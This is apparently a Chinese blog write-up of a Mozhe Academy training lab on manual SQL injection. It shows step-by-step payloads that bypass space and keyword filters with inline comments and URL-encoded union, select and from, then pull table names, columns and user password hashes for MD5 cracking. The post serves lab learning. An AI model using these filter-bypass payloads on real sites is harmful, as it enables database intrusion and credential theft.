墨者学院----SQL过滤字符后手工注入漏洞测试(第2题)

SQL过滤字符后手工注入漏洞测试(第2题)

按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤
尝试利用==/**/空格==进行绕过

?id=1/**/order/**/by/**/4

页面正常说明字段数为4,且order by没有被过滤
接下来利用联合查询,看是否有回显点
输入语句
?id=-1//union//select/**/1,2,3,4发现报错,判断union和select可能被过滤。
我们可以做尝试,把union和select关键字进行url编码在试试效果。

?id=-1/**/%75nion/**/%73elect/**/1,2,3,4

发现页面正常,说明我们推测正确关键字被过滤可以编码绕过(全部编码也可以)
爆出回显位是2和3
在这里插入图片描述
接下来利用老套路进行爆破数据库,表,字段,字段内容。

爆库

?id=-1/**/%75nion/**/%73elect/**/1,database(),3,4

根据页面回显知库:mozhe_discuz_stormgroup

爆表 notice,stormgroup_member
输入原始语句发现页面报错,猜测可能from也被过滤from的url编码==%66%72%6f%6d==

-1/**/%75nion/**/%73elect/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup',3,4

接下来对from进行url编码后得SQL语句

-1/**/%75nion/**/%73elect/**/1,group_concat(table_name),3,4/**/%66%72%6f%6d/**/information_schema.tables/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup'

页面成功回显出表名,因此from也被过滤
在这里插入图片描述

爆字段 id,length,name,password,time,status

-1/**/%75nion/**/%73elect/**/1,group_concat(column_name),3,4/**/%66%72%6f%6d/**/information_schema.columns/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup'/**/and/**/table_name/**/like/**/'stormgroup_member'

在这里插入图片描述
爆字段值

-1/**/%75nion/**/%73elect/**/1,group_concat(name,password),3,4/**/%66%72%6f%6d/**/stormgroup_member

在这里插入图片描述

mozhe01d1bff12cf951bbb9f8d1c3e59620255b
mozhe2a6babd9eb561e9ffd6f5aad28851daa7
admin6aa9483f549c490877c01a5baa521371
最后进行MD5解密即可
这里过滤了空格,关键字select,union,from等
方法二:利用Sqlmap进行探测
具体方法可见我的另一个博客

https://blog.csdn.net/qq_43590351/article/details/112855088
这第二题我感觉和第一题解法一样,感觉被骗了,还我墨币啊啊啊啊啊啊啊

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值